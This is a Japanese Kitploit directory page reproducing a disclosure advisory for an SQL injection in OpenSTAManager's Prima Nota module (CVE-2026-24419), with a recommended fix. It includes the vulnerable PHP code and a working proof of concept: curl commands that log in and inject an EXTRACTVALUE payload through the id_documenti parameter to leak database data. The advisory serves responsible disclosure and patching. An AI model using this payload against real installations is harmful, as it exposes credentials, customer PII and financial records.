Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-24419 — CVE-2026-24419 - OpenSTAManager の Prima Nota モジュールに SQLインジェクションが存在します。 | Kitploit
ツール/GitHubGitHub/lukasz-rybak/cve-2026-24419
脆弱性分析ウェブアプリケーション悪用ペネトレーションテスト論文と研究学習と教育
GitHublukasz-rybak/cve-2026-24419

CVE-2026-24419

CVE-2026-24419 - OpenSTAManager の Prima Nota モジュールに SQLインジェクションが存在します。

リポジトリを見る
4ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-24419: OpenSTAManager の Prima Nota モジュールに SQL インジェクション

概要

フィールド詳細
CVE IDCVE-2026-24419
深刻度HIGH
アドバイザリアドバイザリを表示
発見者Lukasz Rybak

影響を受ける製品

  • devcode-it/openstamanager (バージョン: <= 2.9.8)

CWE 分類

  • CWE-89: SQL コマンドで使用される特殊要素の不適切な無効化 ('SQL インジェクション')

詳細

要約

OpenSTAManager v2.9.8 の Prima Nota (仕訳) モジュールにおける重大なエラーベース SQL インジェクションの脆弱性により、認証された攻撃者が URL パラメータに悪意のある SQL を注入することで、XML エラーメッセージを介してユーザー資格情報、顧客の個人情報 (PII)、財務記録を含むデータベース全体の内容を抽出できる可能性があります。

ステータス: ✅ 実インスタンスで確認・テスト済み (v2.9.8) 脆弱なパラメータ: id_documenti (GET パラメータ) 影響を受けるエンドポイント: /modules/primanota/add.php 攻撃タイプ: エラーベース SQL インジェクション (IN 句)

詳細

OpenSTAManager v2.9.8 の Prima Nota (仕訳) モジュールの add.php ファイルには、重大なエラーベース SQL インジェクションの脆弱性が存在します。このアプリケーションは、GET パラメータからのカンマ区切り値が整数であることを SQL の IN() 句で使用する前に検証していないため、攻撃者が任意の SQL コマンドを注入し、XPATH エラーメッセージを介して機密データを抽出することが可能になります。

脆弱性の連鎖:

  1. エントリポイント: /modules/primanota/add.php (63〜67行目)

    root@kitploit:~
    $id_documenti = $id_documenti ?: get('id_documenti');
    $id_documenti = $id_documenti ? explode(',', (string) $id_documenti) : [];
    

    影響: get() 関数はユーザー制御の URL パラメータを取得し、explode(',', (string) ...) はカンマで分割しますが、要素が整数であることを保証する検証は一切ありません。

  2. SQL インジェクション箇所: /modules/primanota/add.php (306行目)

    root@kitploit:~
    $id_anagrafica = $dbo->fetchOne('SELECT idanagrafica FROM co_documenti WHERE id IN('.($id_documenti ? implode(',', $id_documenti) : 0).')')['idanagrafica'];
    

    影響: $id_documenti の配列要素は、型検証や prepare() なしで implode() を使用して直接連結されるため、完全な SQL インジェクションが可能になります。

根本原因の分析:

この脆弱性は以下の理由で存在します:

  1. get('id_documenti') がユーザー制御の文字列を返す
  2. explode(',', (string) $value) はカンマで分割するが型を検証しない
  3. implode(',', $array) は配列要素を SQL に直接連結する
  4. 配列要素が整数であることを保証する検証がない
  5. 攻撃者は ?id_documenti=1) AND EXTRACTVALUE(...) %23 を指定することで SQL を注入できる

影響を受けるコードパス:

root@kitploit:~
GET /modules/primanota/add.php?id_documenti=MALICIOUS_PAYLOAD
  ↓
add.php:63 - $id_documenti = get('id_documenti')
  ↓
add.php:64 - $id_documenti = explode(',', (string) $id_documenti) [NO TYPE VALIDATION]
  ↓
add.php:306 - WHERE id IN('.implode(',', $id_documenti).') [INJECTION POINT]

PoC

ステップ 1: ログイン

root@kitploit:~
curl -c /tmp/cookies.txt -X POST 'http://localhost:8081/index.php?op=login' \
  -d 'username=admin&password=admin'

ステップ 2: 脆弱性の確認 (エラーベース SQL インジェクション)

テスト 1: データベースのユーザーとバージョンを抽出

root@kitploit:~
curl -b /tmp/cookies.txt "http://localhost:8081/modules/primanota/add.php?id_documenti=1)%20AND%20EXTRACTVALUE(1,CONCAT(0x7e,(SELECT%20CONCAT(USER(),'%20|%20',VERSION()))))%23"

レスポンス (攻撃者に表示されるエラーメッセージ):

root@kitploit:~
<code>SQLSTATE[HY000]: General error: 1105 XPATH syntax error: &#039;[email protected] | 8.3.0&#039;</code>
画像

影響

Prima Nota (仕訳) モジュールにアクセスできるすべての認証済みユーザー。

推奨される修正

主な修正 - 型検証:

ファイル: /modules/primanota/add.php

修正前 (脆弱 - 63〜67行目):

root@kitploit:~
$id_documenti = $id_documenti ?: get('id_documenti');
$id_documenti = $id_documenti ? explode(',', (string) $id_documenti) : [];

修正後 (修正済み):

root@kitploit:~
$id_documenti = $id_documenti ?: get('id_documenti');
$id_documenti = $id_documenti ? explode(',', (string) $id_documenti) : [];
// Validate that all array elements are integers
$id_documenti = array_map('intval', $id_documenti);
$id_documenti = array_filter($id_documenti, fn($id) => $id > 0); // Remove zero/negative IDs

クレジット

Łukasz Rybak によって発見されました

参照

  • https://github.com/devcode-it/openstamanager/security/advisories/GHSA-4j2x-jh4m-fqv6
  • https://nvd.nist.gov/vuln/detail/CVE-2026-24419
  • https://github.com/advisories/GHSA-4j2x-jh4m-fqv6

免責事項

本 CVE は、coordinated vulnerability disclosure (調整された脆弱性の開示) の慣行に従って責任を持って開示されました。ここで提供される情報は、教育および防御のみを目的としています。

ツールをダウンロード